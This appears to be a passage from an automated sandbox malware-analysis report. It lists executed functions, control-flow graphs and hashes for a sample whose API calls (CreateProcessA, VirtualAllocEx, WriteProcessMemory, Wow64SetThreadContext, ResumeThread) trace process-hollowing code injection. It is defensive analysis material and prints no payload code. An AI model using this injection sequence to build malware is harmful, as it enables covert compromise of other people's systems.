27571->27510 27573 7825dd4 27572->27573 27574 7825dfe Wow64SetThreadContext 27572->27574 27573->27510 27576 7825e8d 27574->27576 27576->27510 27578 7825918 ResumeThread 27577->27578 27580 7825989 27578->27580 27580->27515 27582 7825958 ResumeThread 27581->27582 27584 7825989 27582->27584 27584->27515 27586 7825f98 WriteProcessMemory 27585->27586 27588 7826037 27586->27588 27588->27526 27590 7825f9f WriteProcessMemory 27589->27590 27592 7826037 27590->27592 27592->27526 27594 78290c6 27593->27594 27595 7829076 27593->27595 27609 7825ed1 27594->27609 27613 7825ed8 27594->27613 27595->27531 27596 78290eb 27596->27531 27600 78290bf 27599->27600 27602 7825ed1 VirtualAllocEx 27600->27602 27603 7825ed8 VirtualAllocEx 27600->27603 27601 78290ec 27601->27531 27602->27601 27603->27601 27605 78290b8 27604->27605 27607 7825ed1 VirtualAllocEx 27605->27607 27608 7825ed8 VirtualAllocEx 27605->27608 27606 78290ec 27606->27531 27607->27606 27608->27606 27610 7825ed8 VirtualAllocEx 27609->27610 27612 7825f55 27610->27612 27612->27596 27614 7825edf VirtualAllocEx 27613->27614 27616 7825f55 27614->27616 27616->27596 27618 7826227 CreateProcessA 27617->27618 27620 782646b 27618->27620 27622 7826220 CreateProcessA 27621->27622 27624 782646b 27622->27624

                        Executed Functions

                        Function 07583B70 Relevance: .7, Instructions: 739COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 885b2881e5f293d5bf3a6966ca95449c3bfa7cd89cf232dcadeab7cba506138b
                        • Instruction ID: bd38f0103e395c0c406492a2ffc7472b8f70c84a845047ace9f0072de0bc9e6d
                        • Opcode Fuzzy Hash: 885b2881e5f293d5bf3a6966ca95449c3bfa7cd89cf232dcadeab7cba506138b
                        • Instruction Fuzzy Hash: F5623575A00219DFDB54DFA8C984A9DBBB2FF88304F1581A9E509AB366DB31EC51CF40
                        Function 07826214 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 7826214-782621e 1 7826220-7826226 0->1 2 7826227-78262b5 0->2 1->2 4 78262b7-78262c1 2->4 5 78262ee-782630e 2->5 4->5 6 78262c3-78262c5 4->6 12 7826310-782631a 5->12 13 7826347-7826376 5->13 7 78262c7-78262d1 6->7 8 78262e8-78262eb 6->8 10 78262d3 7->10 11 78262d5-78262e4 7->11 8->5 10->11 11->11 15 78262e6 11->15 12->13 14 782631c-782631e 12->14 21 7826378-7826382 13->21 22 78263af-7826469 CreateProcessA 13->22 16 7826320-782632a 14->16 17 7826341-7826344 14->17 15->8 19 782632e-782633d 16->19 20 782632c 16->20 17->13 19->19 23 782633f 19->23 20->19 21->22 24 7826384-7826386 21->24 33 7826472-78264f8 22->33 34 782646b-7826471 22->34 23->17 26 7826388-7826392 24->26 27 78263a9-78263ac 24->27 28 7826396-78263a5 26->28 29 7826394 26->29 27->22 28->28 31 78263a7 28->31 29->28 31->27 44 78264fa-78264fe 33->44 45 7826508-782650c 33->45 34->33 44->45 46 7826500 44->46 47 782650e-7826512 45->47 48 782651c-7826520 45->48 46->45 47->48 49 7826514 47->49 50 7826522-7826526 48->50 51 7826530-7826534 48->51 49->48 50->51 52 7826528 50->52 53 7826546-782654d 51->53 54 7826536-782653c 51->54 52->51 55 7826564 53->55 56 782654f-782655e 53->56 54->53 58 7826565 55->58 56->55 58->58
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07826456
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 8ce075468a30f5838d1e990c2aa277a949c9373d90334f829bb0e1d753091370
                        • Instruction ID: 68c55ac51e4f17713cea329f9590d4fdd2e9e89356b383fe92ebbcc7464a71c9
                        • Opcode Fuzzy Hash: 8ce075468a30f5838d1e990c2aa277a949c9373d90334f829bb0e1d753091370
                        • Instruction Fuzzy Hash: DEA15CB1E0026ADFEF14CF68C9407DDBBB2AF48311F1481A9D848E7240EB749986DF91
                        Function 07826220 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 59 7826220-78262b5 62 78262b7-78262c1 59->62 63 78262ee-782630e 59->63 62->63 64 78262c3-78262c5 62->64 70 7826310-782631a 63->70 71 7826347-7826376 63->71 65 78262c7-78262d1 64->65 66 78262e8-78262eb 64->66 68 78262d3 65->68 69 78262d5-78262e4 65->69 66->63 68->69 69->69 73 78262e6 69->73 70->71 72 782631c-782631e 70->72 79 7826378-7826382 71->79 80 78263af-7826469 CreateProcessA 71->80 74 7826320-782632a 72->74 75 7826341-7826344 72->75 73->66 77 782632e-782633d 74->77 78 782632c 74->78 75->71 77->77 81 782633f 77->81 78->77 79->80 82 7826384-7826386 79->82 91 7826472-78264f8 80->91 92 782646b-7826471 80->92 81->75 84 7826388-7826392 82->84 85 78263a9-78263ac 82->85 86 7826396-78263a5 84->86 87 7826394 84->87 85->80 86->86 89 78263a7 86->89 87->86 89->85 102 78264fa-78264fe 91->102 103 7826508-782650c 91->103 92->91 102->103 104 7826500 102->104 105 782650e-7826512 103->105 106 782651c-7826520 103->106 104->103 105->106 107 7826514 105->107 108 7826522-7826526 106->108 109 7826530-7826534 106->109 107->106 108->109 110 7826528 108->110 111 7826546-782654d 109->111 112 7826536-782653c 109->112 110->109 113 7826564 111->113 114 782654f-782655e 111->114 112->111 116 7826565 113->116 114->113 116->116
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07826456
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 272be4956ca9c675838d60659477353a09cf2b320b88dcb3549caa7058b1b3c2
                        • Instruction ID: da30b453e34d26855cccc2cfbf77093d74cf9a739e020dc39bbd30b373c5b7f6
                        • Opcode Fuzzy Hash: 272be4956ca9c675838d60659477353a09cf2b320b88dcb3549caa7058b1b3c2
                        • Instruction Fuzzy Hash: 4A914BB1E0022ADFEF14CF68C9417DDBAB2AF48311F148169E849E7640EB749985DF91
                        Function 0100B3F8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 117 100b3f8-100b417 118 100b443-100b447 117->118 119 100b419-100b426 call 100a728 117->119 120 100b449-100b453 118->120 121 100b45b-100b49c 118->121 126 100b428 119->126 127 100b43c 119->127 120->121 128 100b4a9-100b4b7 121->128 129 100b49e-100b4a6 121->129 173 100b42e call 100b690 126->173 174 100b42e call 100b6a0 126->174 127->118 130 100b4b9-100b4be 128->130 131 100b4db-100b4dd 128->131 129->128 135 100b4c0-100b4c7 call 100a734 130->135 136 100b4c9 130->136 134 100b4e0-100b4e7 131->134 132 100b434-100b436 132->127 133 100b578-100b638 132->133 168 100b640-100b66b GetModuleHandleW 133->168 169 100b63a-100b63d 133->169 138 100b4f4-100b4fb 134->138 139 100b4e9-100b4f1 134->139 137 100b4cb-100b4d9 135->137 136->137 137->134 141 100b508-100b511 call 100a744 138->141 142 100b4fd-100b505 138->142 139->138 148 100b513-100b51b 141->148 149 100b51e-100b523 141->149 142->141 148->149 150 100b541-100b54e 149->150 151 100b525-100b52c 149->151 157 100b550-100b56e 150->157 158 100b571-100b577 150->158 151->150 153 100b52e-100b53e call 100a754 call 100a764 151->153 153->150 157->158 170 100b674-100b688 168->170 171 100b66d-100b673 168->171 169->168 171->170 173->132 174->132
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B65E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6813307d9c4cf84d9637409124b1e34855478f66e305a23b0015f45f6fa3f300
                        • Instruction ID: 4ad66618a0f11d09f8e2bea4f9851feaab57321f34d378f9579dd88a2b854bea
                        • Opcode Fuzzy Hash: 6813307d9c4cf84d9637409124b1e34855478f66e305a23b0015f45f6fa3f300
                        • Instruction Fuzzy Hash: B6815670A00B058FE765DF29C44079ABBF1FF88704F00896DD48AD7A91DB75E949CB91
                        Function 01004BB4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 175 1004bb4-10060a9 CreateActCtxA 178 10060b2-100610c 175->178 179 10060ab-10060b1 175->179 186 100611b-100611f 178->186 187 100610e-1006111 178->187 179->178 188 1006130 186->188 189 1006121-100612d 186->189 187->186 191 1006131 188->191 189->188 191->191
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01006099
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 98b8bdca39065854cf170b33447c029e11aceb9642c5b38a6a08792849d9ceea
                        • Instruction ID: 334f7eba4ffe41f3d8fbaabfe03600b64c644fa4056b65af088e86be11d5c800
                        • Opcode Fuzzy Hash: 98b8bdca39065854cf170b33447c029e11aceb9642c5b38a6a08792849d9ceea
                        • Instruction Fuzzy Hash: B241E2B0C0071DCBEB25DFA9C944B9EBBF6BF48304F20806AD509AB251DB756945CF90
                        Function 01005FDF Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 192 1005fdf-10060a9 CreateActCtxA 194 10060b2-100610c 192->194 195 10060ab-10060b1 192->195 202 100611b-100611f 194->202 203 100610e-1006111 194->203 195->194 204 1006130 202->204 205 1006121-100612d 202->205 203->202 207 1006131 204->207 205->204 207->207
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01006099
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b403e9dafacc468b0218c1d9ddd99897e796a96215894e0c0deb8a53e61d5ffd
                        • Instruction ID: a8b324f95ea2011ce6f099f51f7783c2789fcf48d8b2b4dadc3661cb0128b13f
                        • Opcode Fuzzy Hash: b403e9dafacc468b0218c1d9ddd99897e796a96215894e0c0deb8a53e61d5ffd
                        • Instruction Fuzzy Hash: 1641F1B0C00719CBEB25DFA9C844BDEBBB6BF48304F24816AD549AB251DB716946CF50
                        Function 07825DF9 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 208 7825df9-7825dfc 209 7825dd4-7825dea 208->209 210 7825dfe-7825e4b 208->210 215 7825e5b-7825e8b Wow64SetThreadContext 210->215 216 7825e4d-7825e59 210->216 218 7825e94-7825ec4 215->218 219 7825e8d-7825e93 215->219 216->215 219->218
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07825E7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: ed1e18ff0dbe2707d27fba1e5ef5f8594d0059a2a3df3d450c5c31a4a78b96ac
                        • Instruction ID: 701a80d685da618d625a7e10abe10b5e2f32b218f6fbd99d792ff0175a43dc62
                        • Opcode Fuzzy Hash: ed1e18ff0dbe2707d27fba1e5ef5f8594d0059a2a3df3d450c5c31a4a78b96ac
                        • Instruction Fuzzy Hash: 9331CBB69003599FDB10CFA9C8857EEFBF4EF48224F14846AE558AB241C7789546CB90
                        Function 07825F90 Relevance: 1.6, APIs: 1, Instructions: 79injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 223 7825f90-7825f96 224 7825f98-7825f9e 223->224 225 7825f9f-7825fe6 223->225 224->225 227 7825ff6-7826035 WriteProcessMemory 225->227 228 7825fe8-7825ff4 225->228 230 7826037-782603d 227->230 231 782603e-782606e 227->231 228->227 230->231
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07826028
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: bd0b900f6148d569d68dacf598c8535a488fed94dfecc29db3932df4ea1fb7bc
                        • Instruction ID: bd3bda2d882ae7eecf635f03d498f603b195efb03f13358a758f4052ea4c0b81
                        • Opcode Fuzzy Hash: bd0b900f6148d569d68dacf598c8535a488fed94dfecc29db3932df4ea1fb7bc
                        • Instruction Fuzzy Hash: C03149B190035ADFDF10CFA9C884BDEBBF5EF48310F10842AE919A7240D7B59555DBA4
                        Function 07825F98 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 235 7825f98-7825fe6 238 7825ff6-7826035 WriteProcessMemory 235->238 239 7825fe8-7825ff4 235->239 241 7826037-782603d 238->241 242 782603e-782606e 238->242 239->238 241->242
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07826028
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: db608c924153085278b73c7db9ee63e8dd2017662c0db226f6bd79300567854f
                        • Instruction ID: a512d61cfd388f971cc3ac1464a7803045af804ddc8a99ef00c4b9047179da59
                        • Opcode Fuzzy Hash: db608c924153085278b73c7db9ee63e8dd2017662c0db226f6bd79300567854f
                        • Instruction Fuzzy Hash: 692126B190035A9FDF10CFAAC881BDEBBF5FF48310F10842AE919A7240D7789955DBA4
                        Function 07826080 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 246 7826080-7826115 ReadProcessMemory 250 7826117-782611d 246->250 251 782611e-782614e 246->251 250->251
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07826108
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 023ad419cdbdc5fc3654888a4545e170c8f7bf7ebea6f16ebb5fcb4a71c35041
                        • Instruction ID: 47aac6876b63e52ddb95394039ac04a2fb58134bcc3f666adbd44d6e420d1c0a
                        • Opcode Fuzzy Hash: 023ad419cdbdc5fc3654888a4545e170c8f7bf7ebea6f16ebb5fcb4a71c35041
                        • Instruction Fuzzy Hash: E82127B190035ADFDB10CFAAC841ADEFBF5FF48320F108529E519A7241D774A951DBA4
                        Function 0100D6F4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 255 100d6f4-100dd64 DuplicateHandle 257 100dd66-100dd6c 255->257 258 100dd6d-100dd8a 255->258 257->258
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100DC96,?,?,?,?,?), ref: 0100DD57
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: f83363c4b38fe7290398e7bcd371211b029669e5b3430279520cc456adbc3c66
                        • Instruction ID: 97d8014faba1d2f6a4a2092a2cfc2873ed6e508ddd9e1ec7804459c13e5c6e23
                        • Opcode Fuzzy Hash: f83363c4b38fe7290398e7bcd371211b029669e5b3430279520cc456adbc3c66
                        • Instruction Fuzzy Hash: 052103B5900249EFDB10CFAAD984ADEBFF5EB48320F14801AE918A3350D374A950CFA4
                        Function 07825E00 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 261 7825e00-7825e4b 263 7825e5b-7825e8b Wow64SetThreadContext 261->263 264 7825e4d-7825e59 261->264 266 7825e94-7825ec4 263->266 267 7825e8d-7825e93 263->267 264->263 267->266
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07825E7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 4a578f1d1035f16355fe1dbddb134a1a574fde6a1071e680f132c053abed52c8
                        • Instruction ID: 98c75da1a40ae95cb4b42620320e78442de309a91c6aae15c3e3f68dbaad230b
                        • Opcode Fuzzy Hash: 4a578f1d1035f16355fe1dbddb134a1a574fde6a1071e680f132c053abed52c8
                        • Instruction Fuzzy Hash: E62149B19003099FDB10DFAAC4857EEBBF5EF88324F14842AD519A7240CB789945CFA5
                        Function 07826088 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 271 7826088-7826115 ReadProcessMemory 274 7826117-782611d 271->274 275 782611e-782614e 271->275 274->275
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07826108
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 048ba371ead6034cc6571bfacd0df09532c2482c37aa778c12823c969e9a4e46
                        • Instruction ID: ea178e5e8d4b2a7886a6e12651b98434351cbf29e69db328d122cd18af13cfee
                        • Opcode Fuzzy Hash: 048ba371ead6034cc6571bfacd0df09532c2482c37aa778c12823c969e9a4e46
                        • Instruction Fuzzy Hash: DA214AB19003599FDF10CFAAC841BDEBBF5FF48310F108429E519A7240D7749550CBA0
                        Function 07825ED1 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 279 7825ed1-7825ed6 280 7825ed8-7825ede 279->280 281 7825edf-7825f53 VirtualAllocEx 279->281 280->281 284 7825f55-7825f5b 281->284 285 7825f5c-7825f81 281->285 284->285
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07825F46
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 415b06daff0f81d20a3850dd54624f68e23cbff57a8d7001dfbbd37a403f5ea1
                        • Instruction ID: b8db7eb6e933b8cf9df2cdc9a87e0e2b4e9d294a8c1742ce06dcaac7e36bb9ce
                        • Opcode Fuzzy Hash: 415b06daff0f81d20a3850dd54624f68e23cbff57a8d7001dfbbd37a403f5ea1
                        • Instruction Fuzzy Hash: 692188728043899FDF10DFA9C841ADEBFF5EF88320F24885AE619A7240C7759954CBA1
                        Function 0100A790 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 289 100a790-100b8a0 291 100b8a2-100b8a5 289->291 292 100b8a8-100b8d7 LoadLibraryExW 289->292 291->292 293 100b8e0-100b8fd 292->293 294 100b8d9-100b8df 292->294 294->293
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0100B6D9,00000800,00000000,00000000), ref: 0100B8CA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d28ac4934a73edca31076e7151461de6cbb2de57b8e3e5be977fa058db7f5308
                        • Instruction ID: 6701f3b564c136fcab57295b9a8a5ffe94430e944a50e79a40d4aad706557d95
                        • Opcode Fuzzy Hash: d28ac4934a73edca31076e7151461de6cbb2de57b8e3e5be977fa058db7f5308
                        • Instruction Fuzzy Hash: 291103BA9002099FEB10CF9AC444A9EFBF5EB88320F14846AE559A7250C3B5A545CFA5
                        Function 07825ED8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07825F46
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9354060e69e2f8643d17b5a0013702b813bb749128fc743278d75b269da4932a
                        • Instruction ID: 4313b7d98d36d9ce38d2477ac36b6e521a0eee9b5e6574db67d8519a0acde2bf
                        • Opcode Fuzzy Hash: 9354060e69e2f8643d17b5a0013702b813bb749128fc743278d75b269da4932a
                        • Instruction Fuzzy Hash: 551126729002499FDF10DFAAC845BDFBBF5EF88320F148819E619A7250C775A954CBA1
                        Function 07825910 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: c72452ee0c249e21dd6da4e9eeb35d0407d6c8d7d6072a93d3fc50731160afbf
                        • Instruction ID: 6d824579660a057044d58b44fb3c5e16d285bc17c3b36b2526e4e6501d026190
                        • Opcode Fuzzy Hash: c72452ee0c249e21dd6da4e9eeb35d0407d6c8d7d6072a93d3fc50731160afbf
                        • Instruction Fuzzy Hash: 72118BB1D003498FDB10DFAAC4457EEFBF4EF88320F24841AD519A7240CB74A945CBA4
                        Function 0100B858 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 297 100b858-100b8a0 298 100b8a2-100b8a5 297->298 299 100b8a8-100b8d7 LoadLibraryExW 297->299 298->299 300 100b8e0-100b8fd 299->300 301 100b8d9-100b8df 299->301 301->300
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0100B6D9,00000800,00000000,00000000), ref: 0100B8CA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f34cc1bcd603a71b5dfd6bf363e0cc84050cdf0f708d579590376ef69e8582da
                        • Instruction ID: 6d94ddd6240af8d4f1631d3b4c699c9bee834481b073846b5085088ae46c7d1d
                        • Opcode Fuzzy Hash: f34cc1bcd603a71b5dfd6bf363e0cc84050cdf0f708d579590376ef69e8582da
                        • Instruction Fuzzy Hash: 321114B6D002498FDB10CFAAC444ADEFBF5EF88310F14846AD559A7250C3B4A545CFA4
                        Function 07825918 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5ebb297b0f79aab4287050ad62a9db2283cbc857e0b64aba9605d8e952488d30
                        • Instruction ID: 5e4e0ad315c3e58a926a0c4ed623bc9e19bddf696306cff6fd45dad86e1c0259
                        • Opcode Fuzzy Hash: 5ebb297b0f79aab4287050ad62a9db2283cbc857e0b64aba9605d8e952488d30
                        • Instruction Fuzzy Hash: 93116AB1D003498FDB10DFAAC4457AFFBF5EF88720F24841AD519A7240CB75A944CB94
                        Function 07827638 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 078295E5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 2ce680db287b1029ab8af60535c5d138e94739d9b24f2c001abe77b406b0dfdd
                        • Instruction ID: af612b8a81463957d152a8cea08f901d8b39764dc1ae53e8dc2d6ae00c587c1b
                        • Opcode Fuzzy Hash: 2ce680db287b1029ab8af60535c5d138e94739d9b24f2c001abe77b406b0dfdd
                        • Instruction Fuzzy Hash: 111125B5900349DFCB10DF99C584BDEBBF8EB48324F108419E619A7200C3B5A984CFA0
                        Function 0100B5F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B65E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: d7002561c3a8ada55f175a50937c5dc280f9a820527490f7c469ddb4091a4e15
                        • Instruction ID: 3c188952010ea2af03e8886fb3d627c874779089ba314c34b055991261f13f0b
                        • Opcode Fuzzy Hash: d7002561c3a8ada55f175a50937c5dc280f9a820527490f7c469ddb4091a4e15
                        • Instruction Fuzzy Hash: D4110FB6C006498FDB10CF9AC844A9EFBF4EF88224F10846AD959A7250C3B9A545CFA1
